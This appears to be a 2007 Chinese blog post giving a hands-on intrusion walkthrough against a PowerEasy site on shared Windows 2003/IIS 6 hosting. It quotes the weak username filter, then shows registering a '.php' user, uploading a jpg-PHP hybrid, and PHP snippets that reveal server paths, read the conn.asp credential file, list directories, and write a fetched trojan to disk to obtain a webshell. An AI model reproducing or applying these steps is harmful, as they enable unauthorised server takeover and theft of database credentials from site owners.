原理   : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是     : 服务器是win2003 全功能的空间


**************************************************
'函数名:UserNamefilter(
'作  用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)
'**************************************************
Function UserNamefilter(strChar)
    If strChar = "" or IsNull(strChar) Then
        UserNamefilter = ""
        Exit Function
    End If
    Dim strBadChar, arrBadChar, tempChar, i
    strBadChar = "',%,^,&,?,(,),<,>,[,],{,},/,\,;,:," & Chr(34) & "," & Chr(0) & ",*,|,"""
    arrBadChar = Split(strBadChar, ",")
    tempChar = strChar
    For i = 0 To UBound(arrBadChar)
        tempChar = Replace(tempChar, arrBadChar(i), "")
    Next
    UserNamefilter = Replace(Replace(Replace(Replace(LCase(tempChar),"cdx",""),"cer",""),"asp",""),"asa","")
End Function
%>

今天在看一个空间的时候,发现是动易,已打补丁.
旁注一查是虚拟主机 本来多没抱多大希望了
随便看了一下几个网站 发现是全能空间
拿出X-Scan狂扫一下 终端登录一下确定是win2003
默认的IIS 6解析文件名错误包含 .php .pl
动易Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
这就给我们机会了 呵呵

先看一下下面的图片默认的.asp用户名已经不能注册了

接着注册一个.php的用户


兴冲冲的把asp马改成jpg 去传结果如下


既然这个方法不行就要想其他办法了 既然是在.php的目录下 php语句不知道能不能执行
由于我PHP实在不懂,google狂找一下 难免弯路有走了很多
退回原来的思路 构建JPG GIF的文件头的PHP或者ASP木马 好像我还没那技术 呵呵
最后把jpg和php合并为jpg文件上传到空间 


运行 发现能执行PHP语句 接下来事情就好办了


查看php配置信息 网站的绝对路径
<?php phpinfo(); ?>


读取conn.asp的内容
<?php
$file_handle = fopen("服务器本地地址", "r");
while (!feof($file_handle)) {
   $line = fgets($file_handle);
   echo $line;
}
fclose($file_handle);
?>




读取网站目录
<?php
$base_dir = "filelist/";
$fso  = opendir($base_dir);
echo $base_dir."<hr/>"  ;
while($flist=readdir($fso)){ 
echo $flist."<br/>" ;
}
closedir($fso)
?>





突破上传限制 得到webshell
<?php
$bruce=fopen("木马地址","r");
if(!$bruce)
{
    echo'文件不存在';
    exit;
}
while (!feof($bruce))
{
    $rose=fgets($bruce);
        $james=fopen("服务器本地路径","a");
        fwrite($james,$rose);
        fclose($james);
}
fclose($bruce);
?>
posted on 2007-06-11 16:38  %5C  阅读(2631)  评论(0编辑  收藏  举报